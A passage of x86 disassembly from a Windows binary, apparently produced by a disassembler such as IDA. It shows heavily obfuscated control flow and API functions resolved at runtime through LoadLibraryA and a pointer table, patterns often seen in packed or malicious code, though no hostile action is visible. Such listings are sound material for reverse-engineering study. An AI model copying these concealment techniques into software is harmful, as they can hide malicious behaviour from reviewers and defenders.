pop eax
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9AB1A0
loc_9B0534: ; CODE XREF: sub_9AB1A0-189�j
cmp edi, 2
jb loc_9AFE6F
jmp off_9BA63B
; END OF FUNCTION CHUNK FOR sub_9AB1A0
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9B0544: ; CODE XREF: sub_9B0930+5796�j
; DATA XREF: .text:off_9B969F�o
push off_9B907A
push dword ptr [eax]
pop eax
push eax
call esi
mov ecx, dword_9BCB74
push dword ptr [ecx]
pop edx
mov [edx+74h], eax
push dword_9BCB74
pop eax
push dword ptr [eax]
pop eax
mov ecx, [eax+74h]
jmp loc_9B531C
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B2118
loc_9B0570: ; CODE XREF: sub_9B2118+9D9�j
mov dword_9BEC14, esi
mov dword_9BEC18, esi
mov eax, dword_9BCB74
push dword ptr [eax]
pop ecx
push off_9BAF9B
call dword ptr [ecx+68h]
sub eax, eax
push off_9B9FDF
pop edi
push 93h
pop ecx
rep stosd
call sub_9B6388
call sub_9B57B4
mov edx, dword_9BCB74
mov eax, [edx]
push off_9BAD92
call dword ptr [eax+68h]
call sub_9B022C
mov dword_9BEBF8, esi
mov dword_9BEBF4, esi
call sub_9B3C6C
push [ebp+arg_0]
pop ecx
push ecx
call sub_9AD2B8
mov dword_9BF11C, esi
mov [ebp+var_1C], 1
jmp loc_9B034B
; END OF FUNCTION CHUNK FOR sub_9B2118
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B4724
loc_9B05EC: ; CODE XREF: sub_9B4724+55�j
pop edi
pop ebx
; END OF FUNCTION CHUNK FOR sub_9B4724
; START OF FUNCTION CHUNK FOR sub_9AB95C
loc_9B05EE: ; CODE XREF: sub_9AB95C+B�j
pop esi
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_9AB95C
; ---------------------------------------------------------------------------
align 4
push 1
pop eax
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B6370
loc_9B05F8: ; CODE XREF: sub_9B6370-4B4A�j
; DATA XREF: .text:off_9BACB6�o
pop edi
pop esi
loc_9B05FA: ; CODE XREF: sub_9B6370+E�j
pop ebx
retn 0Ch
; END OF FUNCTION CHUNK FOR sub_9B6370
; ---------------------------------------------------------------------------
align 10h
mov eax, dword_9BCB74
mov ecx, [eax+14h]
push off_9B98C1
call dword ptr [ecx+0Ch]
mov edx, dword_9BCB74
push dword ptr [edx]
pop eax
add esp, 4
call dword ptr [eax+30h]
mov dword_9BCB94, eax
retn
; ---------------------------------------------------------------------------
align 4
loc_9B0628: ; CODE XREF: .text:009B0C81�j
pop ebp
retn
; ---------------------------------------------------------------------------
align 4
push 1
pop eax
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9B0630: ; CODE XREF: sub_9B0930+1AB6�j
push off_9B9203
push dword ptr [eax]
pop ecx
push ecx
call esi
mov edx, dword_9BCB74
mov ecx, [edx]
mov [ecx+30h], eax
push dword_9BCB74
pop edx
mov eax, [edx]
push dword ptr [eax+30h]
pop ecx
and ecx, ecx
jz loc_9B23EF
jmp off_9BA8C4
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B2010
loc_9B0664: ; CODE XREF: sub_9B2010+3E�j
push dword_9BCB74
pop eax
mov ecx, [eax]
call dword ptr [ecx+30h]
sub eax, dword_9BEBF8
cmp eax, 2710h
jbe loc_9AE704
jmp loc_9AE6CC
; END OF FUNCTION CHUNK FOR sub_9B2010
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AB040
loc_9B0688: ; CODE XREF: sub_9AB040+5D62�j
push dword_9BCB74
pop eax
mov ecx, [eax]
push off_9BAD92
mov edi, 1
call dword ptr [ecx+1Ch]
push edi
pop eax
pop edi
retn
; END OF FUNCTION CHUNK FOR sub_9AB040
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B1A08
loc_9B06A4: ; CODE XREF: sub_9B1A08-4835�j
; DATA XREF: .text:off_9BA5FC�o
push esi
lea edx, [ebp+var_41F0]
push edx
push 64h
lea eax, [ebp+var_43B4]
push eax
mov ecx, 11h
call sub_9AB1A0
loc_9B06BF: ; CODE XREF: sub_9B1A08-483B�j
push [ebp+var_41F0]
pop esi
or esi, esi
jbe loc_9B16BE
jmp off_9BA4C5
; END OF FUNCTION CHUNK FOR sub_9B1A08
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9ABA3C
loc_9B06D4: ; CODE XREF: sub_9ABA3C+28D0�j
; DATA XREF: .text:off_9BA716�o
sub eax, edx
cmp byte ptr [esi+eax-1], 5Ch
jnz loc_9B5D02
jmp off_9B93AF
; END OF FUNCTION CHUNK FOR sub_9ABA3C
; ---------------------------------------------------------------------------
align 4
mov esp, [ebp-18h]
; START OF FUNCTION CHUNK FOR sub_9AF654
loc_9B06EB: ; CODE XREF: sub_9AF654-AE1�j
; sub_9AF654+38�j ...
mov dword ptr [ebp-4], 0FFFFFFFFh
push dword ptr [ebp-1Ch]
pop eax
push dword ptr [ebp-10h]
pop ecx
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_9AF654
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9AC32C
loc_9B0708: ; CODE XREF: sub_9AC32C+1E�j
mov [esp+324h+var_308], ecx
mov [esp+324h+var_30C], edx
loc_9B0710: ; CODE XREF: sub_9AC32C+18�j
push eax
pop ebp
and ebp, 10h
jz loc_9ABACA
jmp loc_9ABABC
; END OF FUNCTION CHUNK FOR sub_9AC32C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9AB1A0
loc_9B0720: ; CODE XREF: sub_9AB1A0+62A8�j
not esi
or esi, eax
cmp edi, esi
jz loc_9B290C
jmp loc_9AAE28
; END OF FUNCTION CHUNK FOR sub_9AB1A0
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_9B0734 proc near ; CODE XREF: sub_9B04A8-3CE1�p
; sub_9B1A08-32A�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 009AB28C SIZE 00000021 BYTES
; FUNCTION CHUNK AT 009ACD64 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 009B2674 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 009B41F0 SIZE 0000005F BYTES
; FUNCTION CHUNK AT 009B4D48 SIZE 0000000C BYTES
push ecx
push esi
push eax
push edi
push ecx
pop esi
mov eax, 8
mov dword ptr [ebx], 0
call sub_9AC32C
test al, 3
jnz loc_9B4D4F
jmp off_9B9703
sub_9B0734 endp
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9AF654
loc_9B075C: ; CODE XREF: sub_9AF654+3E�j
mov esi, ecx
shr ecx, 2
mov edi, [edx+44h]
rep stosd
push esi
pop ecx
and ecx, 3
rep stosb
mov ecx, [edx]
sub ecx, 240h
mov esi, [edx+48h]
push dword ptr [edx+44h]
pop edi
push ecx
pop eax
add esi, 40h
shr ecx, 2
rep movsd
push eax
pop ecx
and ecx, 3
rep movsb
xor eax, eax
mov ecx, [edx]
push dword ptr [edx+48h]
pop edi
push ecx
pop esi
shr ecx, 2
rep stosd
push esi
pop ecx
jmp off_9B887A
; END OF FUNCTION CHUNK FOR sub_9AF654
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9ABD30
loc_9B07A4: ; CODE XREF: sub_9ABD30+42D5�j
; DATA XREF: .text:off_9BA5F8�o
mov ecx, 4
jz loc_9B11CE
jmp loc_9AD5B4
; END OF FUNCTION CHUNK FOR sub_9ABD30
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9AEE5C
loc_9B07B8: ; CODE XREF: sub_9AEE5C-E5B�j
; DATA XREF: .text:off_9B87B0�o
cmp dword ptr [ecx], 40h
jb loc_9B5A71
jmp off_9B8FC8
; END OF FUNCTION CHUNK FOR sub_9AEE5C
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B562C
loc_9B07C8: ; CODE XREF: sub_9B562C-4B20�j
; DATA XREF: .text:off_9BA469�o
push dword_9BCB74
pop edx
push dword ptr [edx+18h]
pop eax
lea ecx, [ebp+var_134]
push ecx
lea edx, [ebp+var_124]
push edx
call dword ptr [eax+4]
push eax
pop edi
mov [ebp+var_13C], edi
cmp edi, ebx
jz loc_9AECDF
jmp loc_9AD498
; END OF FUNCTION CHUNK FOR sub_9B562C
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B3408
loc_9B07FC: ; CODE XREF: sub_9B3408-4DBD�j
; DATA XREF: .text:off_9BA6FF�o
push dword ptr [ebp-128h]
pop ecx
cmp ecx, 340h
jb loc_9AB749
jmp off_9BA859
; END OF FUNCTION CHUNK FOR sub_9B3408
; ---------------------------------------------------------------------------
align 4
push dword_9BCB74
pop eax
mov ecx, [eax]
push off_9BAF9B
call dword ptr [ecx+68h]
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_9B082C proc near ; CODE XREF: sub_9B27D8-5110�j
; DATA XREF: .text:off_9B9868�o
; FUNCTION CHUNK AT 009AB318 SIZE 00000013 BYTES
push ebx
pop edi
dec edi
loc_9B082F: ; CODE XREF: sub_9B082C+9�j
mov al, [edi+1]
inc edi
and al, al
jnz short loc_9B082F
jmp loc_9AB318
sub_9B082C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
sub eax, eax
mov dword_9BEC14, eax
mov dword_9BEC18, eax
retn
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B31A8
loc_9B084C: ; CODE XREF: sub_9B31A8-1EA1�j
; DATA XREF: .text:off_9B8DEB�o
mov edx, dword_9BCB74
mov eax, [edx]
push dword ptr [esi]
pop ecx
mov edx, [ecx+4]
push edx
call dword ptr [eax+24h]
mov eax, dword_9BCB74
push dword ptr [eax]
pop ecx
push dword ptr [esi]
pop edx
push dword ptr [edx+8]
pop eax
push eax
call dword ptr [ecx+24h]
push dword ptr [esi]
pop eax
call sub_9AC448
mov [ebp+var_1C], 1
mov [esi], edi
jmp loc_9B1CBF
; END OF FUNCTION CHUNK FOR sub_9B31A8
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AFC28
loc_9B0888: ; CODE XREF: sub_9AFC28-4484�j
; DATA XREF: .text:off_9BAAA1�o
mov ecx, [ebx+4]
sub eax, eax
push ecx
pop edx
shr ecx, 2
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
mov ecx, esi
push [ebp+arg_4]
pop esi
mov eax, ecx
shr ecx, 2
push dword ptr [ebx]
pop edi
rep movsd
push eax
pop ecx
and ecx, 3
rep movsb
mov ecx, dword_9BCB74
mov edx, [ecx]
push dword ptr [edx]
pop eax
mov [ebx+8], eax
push dword_9BCB74
pop ecx
mov edx, [ecx]
push dword ptr [edx+8]
pop eax
mov [ebx+0Ch], eax
mov ecx, [ebp+arg_8]
mov [ebx+10h], ecx
push [ebp+arg_C]
pop edx
mov [ebx+14h], edx
push [ebp+arg_10]
pop eax
mov [ebx+18h], eax
mov ecx, [ebp+arg_14]
mov [ebx+1Ch], ecx
push [ebp+arg_0]
pop eax
or eax, eax
jz sub_9B0CC8
jmp loc_9AF19C
; END OF FUNCTION CHUNK FOR sub_9AFC28
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9B08FC: ; CODE XREF: sub_9B0930+277A�j
push off_9B91D4
mov eax, [eax]
push eax
call esi
push dword_9BCB74
pop ecx
mov edx, [ecx+18h]
mov [edx+8], eax
mov eax, dword_9BCB74
mov eax, [eax+18h]
mov ecx, [eax+8]
test ecx, ecx
jz loc_9B23EF
jmp off_9B9F0B
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_9B0930 proc near ; CODE XREF: sub_9B2118+32�p
; FUNCTION CHUNK AT 009AAE14 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 009AB0D8 SIZE 00000031 BYTES
; FUNCTION CHUNK AT 009AB1F8 SIZE 00000037 BYTES
; FUNCTION CHUNK AT 009AB230 SIZE 00000033 BYTES
; FUNCTION CHUNK AT 009AB374 SIZE 00000035 BYTES
; FUNCTION CHUNK AT 009AB5D8 SIZE 00000035 BYTES
; FUNCTION CHUNK AT 009AB974 SIZE 00000033 BYTES
; FUNCTION CHUNK AT 009ABB88 SIZE 00000035 BYTES
; FUNCTION CHUNK AT 009ABCB8 SIZE 00000032 BYTES
; FUNCTION CHUNK AT 009ABF58 SIZE 00000039 BYTES
; FUNCTION CHUNK AT 009AC04C SIZE 00000064 BYTES
; FUNCTION CHUNK AT 009AC0EC SIZE 00000037 BYTES
; FUNCTION CHUNK AT 009AC4B0 SIZE 00000035 BYTES
; FUNCTION CHUNK AT 009AC588 SIZE 00000036 BYTES
; FUNCTION CHUNK AT 009AC814 SIZE 00000092 BYTES
; FUNCTION CHUNK AT 009AC960 SIZE 00000035 BYTES
; FUNCTION CHUNK AT 009ACBE4 SIZE 00000032 BYTES
; FUNCTION CHUNK AT 009AD0A4 SIZE 00000033 BYTES
; FUNCTION CHUNK AT 009AD254 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 009AD55C SIZE 00000032 BYTES
; FUNCTION CHUNK AT 009AD968 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 009AD9E4 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 009ADC44 SIZE 00000034 BYTES
; FUNCTION CHUNK AT 009ADEAC SIZE 00000034 BYTES
; FUNCTION CHUNK AT 009AE0FC SIZE 00000036 BYTES
; FUNCTION CHUNK AT 009AE150 SIZE 00000034 BYTES
; FUNCTION CHUNK AT 009AE254 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 009AE35C SIZE 00000033 BYTES
; FUNCTION CHUNK AT 009AE390 SIZE 00000031 BYTES
; FUNCTION CHUNK AT 009AE490 SIZE 00000033 BYTES
; FUNCTION CHUNK AT 009AE508 SIZE 00000039 BYTES
; FUNCTION CHUNK AT 009AE574 SIZE 00000029 BYTES
; FUNCTION CHUNK AT 009AE5A0 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 009AE8E4 SIZE 00000031 BYTES
; FUNCTION CHUNK AT 009AEE6C SIZE 00000055 BYTES
; FUNCTION CHUNK AT 009AEFC0 SIZE 00000039 BYTES
; FUNCTION CHUNK AT 009AF2CC SIZE 00000033 BYTES
; FUNCTION CHUNK AT 009AF44C SIZE 00000034 BYTES
; FUNCTION CHUNK AT 009AF6D0 SIZE 00000032 BYTES
; FUNCTION CHUNK AT 009AF818 SIZE 00000036 BYTES
; FUNCTION CHUNK AT 009AFC00 SIZE 00000028 BYTES
; FUNCTION CHUNK AT 009AFE8C SIZE 00000033 BYTES
; FUNCTION CHUNK AT 009B000C SIZE 0000002F BYTES
; FUNCTION CHUNK AT 009B0544 SIZE 0000002A BYTES
; FUNCTION CHUNK AT 009B0630 SIZE 00000032 BYTES
; FUNCTION CHUNK AT 009B08FC SIZE 00000031 BYTES
; FUNCTION CHUNK AT 009B0984 SIZE 00000030 BYTES
; FUNCTION CHUNK AT 009B0A64 SIZE 00000031 BYTES
; FUNCTION CHUNK AT 009B0B64 SIZE 00000032 BYTES
; FUNCTION CHUNK AT 009B0C0C SIZE 00000013 BYTES
; FUNCTION CHUNK AT 009B0CE8 SIZE 0000002F BYTES
; FUNCTION CHUNK AT 009B0E28 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 009B0EE4 SIZE 00000034 BYTES
; FUNCTION CHUNK AT 009B1408 SIZE 00000034 BYTES
; FUNCTION CHUNK AT 009B1714 SIZE 00000037 BYTES
; FUNCTION CHUNK AT 009B188C SIZE 00000030 BYTES
; FUNCTION CHUNK AT 009B1B0C SIZE 00000014 BYTES
; FUNCTION CHUNK AT 009B1BC0 SIZE 00000038 BYTES
; FUNCTION CHUNK AT 009B1C5C SIZE 00000031 BYTES
; FUNCTION CHUNK AT 009B1CE8 SIZE 00000033 BYTES
; FUNCTION CHUNK AT 009B1EF0 SIZE 00000029 BYTES
; FUNCTION CHUNK AT 009B1F30 SIZE 00000036 BYTES
; FUNCTION CHUNK AT 009B2054 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 009B2068 SIZE 00000035 BYTES
; FUNCTION CHUNK AT 009B2368 SIZE 0000002F BYTES
; FUNCTION CHUNK AT 009B23C0 SIZE 0000002B BYTES
; FUNCTION CHUNK AT 009B23EF SIZE 0000001B BYTES
; FUNCTION CHUNK AT 009B245C SIZE 00000033 BYTES
; FUNCTION CHUNK AT 009B2584 SIZE 00000030 BYTES
; FUNCTION CHUNK AT 009B2790 SIZE 0000002E BYTES
; FUNCTION CHUNK AT 009B2C88 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 009B2D8C SIZE 00000013 BYTES
; FUNCTION CHUNK AT 009B2DB8 SIZE 00000032 BYTES
; FUNCTION CHUNK AT 009B3078 SIZE 00000037 BYTES
; FUNCTION CHUNK AT 009B31F4 SIZE 00000032 BYTES
; FUNCTION CHUNK AT 009B37B4 SIZE 00000032 BYTES
; FUNCTION CHUNK AT 009B38FC SIZE 00000032 BYTES
; FUNCTION CHUNK AT 009B3A18 SIZE 00000035 BYTES
; FUNCTION CHUNK AT 009B3E00 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 009B3E44 SIZE 00000031 BYTES
; FUNCTION CHUNK AT 009B3E90 SIZE 00000032 BYTES
; FUNCTION CHUNK AT 009B40C8 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 009B41BC SIZE 00000032 BYTES
; FUNCTION CHUNK AT 009B426C SIZE 00000031 BYTES
; FUNCTION CHUNK AT 009B480C SIZE 00000032 BYTES
; FUNCTION CHUNK AT 009B4898 SIZE 00000031 BYTES
; FUNCTION CHUNK AT 009B4B18 SIZE 00000034 BYTES
; FUNCTION CHUNK AT 009B4BD0 SIZE 00000027 BYTES
; FUNCTION CHUNK AT 009B4C0C SIZE 0000002F BYTES
; FUNCTION CHUNK AT 009B4D3C SIZE 0000000C BYTES
; FUNCTION CHUNK AT 009B505C SIZE 00000031 BYTES
; FUNCTION CHUNK AT 009B50A0 SIZE 00000030 BYTES
; FUNCTION CHUNK AT 009B51EC SIZE 00000031 BYTES
; FUNCTION CHUNK AT 009B531C SIZE 0000000D BYTES
; FUNCTION CHUNK AT 009B5594 SIZE 00000030 BYTES
; FUNCTION CHUNK AT 009B55F4 SIZE 00000036 BYTES
; FUNCTION CHUNK AT 009B574C SIZE 00000066 BYTES
; FUNCTION CHUNK AT 009B5B08 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 009B5EAC SIZE 00000034 BYTES
; FUNCTION CHUNK AT 009B60C0 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 009B633C SIZE 00000012 BYTES
push ebp
push esp
pop ebp
push 0FFFFFFFFh
push off_9B93DB
push off_9B8CBD
push large dword ptr fs:0
pop eax
push eax
mov large fs:0, esp
sub esp, 14h
push ebx
push esi
push edi
sub esi, esi
mov [ebp-18h], esp
mov [ebp-20h], esi
mov [ebp-4], esi
push off_9B98E6
push LoadLibraryA
pop ebx
call ebx
mov [ebp-1Ch], eax
cmp eax, esi
jz loc_9B23EF
jmp off_9B9429
sub_9B0930 endp
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9B0984: ; CODE XREF: sub_9B0930+4C8F�j
push off_9B97E5
mov eax, [eax]
push eax
call esi
mov ecx, dword_9BCB74
mov edx, [ecx+10h]
mov [edx+5Ch], eax
mov eax, dword_9BCB74
mov eax, [eax+10h]
push dword ptr [eax+5Ch]
pop ecx
test ecx, ecx
jz loc_9B23EF
jmp loc_9AC588
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B6078
loc_9B09B4: ; CODE XREF: sub_9B6078-B0A4�j
; DATA XREF: .text:off_9BA85D�o
sub eax, edx
add eax, ebx
push eax
push 2
call sub_9AD3EC
loc_9B09C0: ; CODE XREF: sub_9B6078-A728�j
mov [ebp+var_4], 0FFFFFFFFh
mov ecx, [ebp+var_10]
mov large fs:0, ecx
mov eax, ebx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_9B6078
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AF5E4
loc_9B09DC: ; CODE XREF: sub_9AF5E4-1E7E�j
jnz loc_9AD761
jmp off_9BA7F6
; END OF FUNCTION CHUNK FOR sub_9AF5E4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B35A0
loc_9B09E8: ; CODE XREF: sub_9B35A0+25�j
push esi
push edi
mov [ebp+var_18], esp
mov edi, ecx
push dword_9BCB74
pop eax
mov ecx, [eax]
push off_9BA623
call dword ptr [ecx+18h]
mov [ebp+var_4], 0
lea esi, [edi+edi*2]
shl esi, 4
mov eax, dword_9BBF9C[esi]
or eax, eax
jz loc_9B10EA
jmp off_9B8DF3
; END OF FUNCTION CHUNK FOR sub_9B35A0
; ---------------------------------------------------------------------------
align 4
mov esp, [ebp-18h]
; START OF FUNCTION CHUNK FOR sub_9B1B20
loc_9B0A27: ; CODE XREF: sub_9B1B20-1DA�j
; sub_9B1B20+93�j
mov [ebp+var_4], 0FFFFFFFFh
mov eax, dword_9BCB74
mov ecx, [eax]
push off_9BA97F
call dword ptr [ecx+1Ch]
push [ebp+var_330]
pop eax
push [ebp+var_10]
pop ecx
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov ecx, [ebp+var_1C]
xor ecx, ebp
call sub_9AAAC1
mov esp, ebp
pop ebp
retn 4
; END OF FUNCTION CHUNK FOR sub_9B1B20
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9B0A64: ; CODE XREF: sub_9B0930+B06�j
; DATA XREF: .text:off_9B9F62�o
push off_9B933A
mov ecx, [eax]
push ecx
call esi
mov edx, dword_9BCB74
mov ecx, [edx]
mov [ecx+38h], eax
push dword_9BCB74
pop edx
push dword ptr [edx]
pop eax
push dword ptr [eax+38h]
pop ecx
or ecx, ecx
jz loc_9B23EF
jmp loc_9B4C0C
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B4FD0
loc_9B0A98: ; CODE XREF: sub_9B4FD0-8478�j
mov edx, [ebp+24h]
cmp dword_9BBF8C[eax], edx
jnz loc_9AB8C4
jmp off_9B989F
; END OF FUNCTION CHUNK FOR sub_9B4FD0
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B5480
loc_9B0AB0: ; CODE XREF: sub_9B5480+39�j
; DATA XREF: .text:off_9B88C8�o
push dword ptr [esi]
pop eax
test eax, eax
jz loc_9B335B
jmp loc_9AE9A0
; END OF FUNCTION CHUNK FOR sub_9B5480
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B4610
loc_9B0AC0: ; CODE XREF: sub_9B4610+50�j
; DATA XREF: .text:off_9BB048�o
lea esi, [edi+edi*2]
shl esi, 4
mov eax, dword_9BBF74[esi]
or eax, eax
jz loc_9AF22F
jmp off_9B956C
; END OF FUNCTION CHUNK FOR sub_9B4610
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B562C
loc_9B0ADC: ; CODE XREF: sub_9B562C+5E�j
mov eax, off_9BA9E4
loc_9B0AE1: ; CODE XREF: sub_9B562C+58�j
mov edx, dword_9BCB74
push dword ptr [edx]
pop esi
push 105h
lea ecx, [ebp+var_124]
push ecx
push eax
call dword ptr [esi+8Ch]
push eax
call dword ptr [esi+88h]
and eax, eax
jz loc_9AECDF
jmp off_9BA469
; END OF FUNCTION CHUNK FOR sub_9B562C
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B18F8
loc_9B0B14: ; CODE XREF: sub_9B18F8+1F�j
; DATA XREF: .text:off_9B970F�o
mov eax, [esp+8+arg_0]
push eax
push 4
pop edi
call sub_9AC6A0
push off_9B9EF1
call sub_9AC6A0
add esp, 8
pop edi
pop esi
retn 4
; END OF FUNCTION CHUNK FOR sub_9B18F8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9AD11C
loc_9B0B34: ; CODE XREF: sub_9AD11C+846C�j
push dword_9BCB74
pop edx
push dword ptr [edx+10h]
pop eax
call dword ptr [eax+4Ch]
cmp eax, 2733h
jz loc_9AB910
jmp loc_9B33D0
; END OF FUNCTION CHUNK FOR sub_9AD11C
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AF25C
loc_9B0B54: ; CODE XREF: sub_9AF25C+60F0�j
; DATA XREF: .text:off_9BADA0�o
cmp edi, ebx
jnz loc_9AB8D1
jmp off_9B9A1D
; END OF FUNCTION CHUNK FOR sub_9AF25C
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9B0B64: ; CODE XREF: sub_9B0930+1A61�j
; DATA XREF: .text:off_9B9624�o
push off_9BAFBF
mov ecx, [eax]
push ecx
call esi
push dword_9BCB74
pop edx
mov ecx, [edx+14h]
mov [ecx+0Ch], eax
mov eax, dword_9BCB74
push dword ptr [eax+14h]
pop edx
mov ecx, [edx+0Ch]
and ecx, ecx
jz loc_9B23EF
jmp off_9B927C
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9ABF08
loc_9B0B98: ; CODE XREF: sub_9ABF08+6CF1�j
; DATA XREF: .text:off_9BA0C1�o
mov eax, dword_9BCB74
push dword ptr [eax]
pop ecx
push esi
push edi
push esi
push dword ptr [ebp+8]
pop edx
push edx
push edi
push edi
call dword ptr [ecx+14h]
mov [esi+4], eax
cmp eax, edi
jz loc_9AF200
jmp off_9B9A50
; END OF FUNCTION CHUNK FOR sub_9ABF08
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9ADAC4
loc_9B0BC0: ; CODE XREF: sub_9ADAC4-73F�j
; DATA XREF: .text:off_9BAED5�o
mov edx, dword_9BCB74
mov eax, [edx+10h]
push ebx
call dword ptr [eax+38h]
or ebx, 0FFFFFFFFh
mov [ebp-44h], ebx
loc_9B0BD3: ; CODE XREF: sub_9ADAC4-2BE1�j
; sub_9ADAC4-745�j ...
mov ecx, dword_9BCB74
mov edx, [ecx]
push 1388h
call dword ptr [edx+4]
jmp loc_9B42D8
; END OF FUNCTION CHUNK FOR sub_9ADAC4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9AF030
loc_9B0BE8: ; CODE XREF: sub_9AF030+2345�j
; DATA XREF: .text:off_9B9FDB�o
add dword_9BBFA0[esi], ebx
call sub_9B227C
mov dword_9BBF98[esi], eax
mov eax, [ebp+arg_C]
test eax, eax
jnz loc_9B1518
jmp off_9BA677
; END OF FUNCTION CHUNK FOR sub_9AF030
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9B0C0C: ; CODE XREF: sub_9B0930-2FBC�j
; DATA XREF: .text:off_9B88D0�o
push dword ptr [eax+0Ch]
pop edx
cmp dword ptr [edx], 0
jz loc_9B23EF
jmp off_9BAD59
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B0C20 proc near ; CODE XREF: sub_9B0CC8+1�p
; sub_9B1134+34�p
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 009B56EB SIZE 0000001A BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push off_9B8CDA
push offset unknown_libname_1 ; Microsoft VisualC 2-8/net runtime
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 8
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov [ebp+var_4], 0
push [ebp+arg_0]
pop eax
pusha
push eax
call dword ptr [eax]
pop eax
popa
jmp loc_9B56EB
sub_9B0C20 endp
; ---------------------------------------------------------------------------
align 10h
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
mov dword ptr [ebp-4], 0FFFFFFFFh
push dword ptr [ebp+10h]
pop eax
mov ecx, [ebp-10h]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
jmp loc_9B0628
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B3150
loc_9B0C88: ; CODE XREF: sub_9B3150+2DE7�j
; DATA XREF: .text:off_9BA093�o
rep stosb
jmp loc_9AEFA3
; END OF FUNCTION CHUNK FOR sub_9B3150
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B1F68
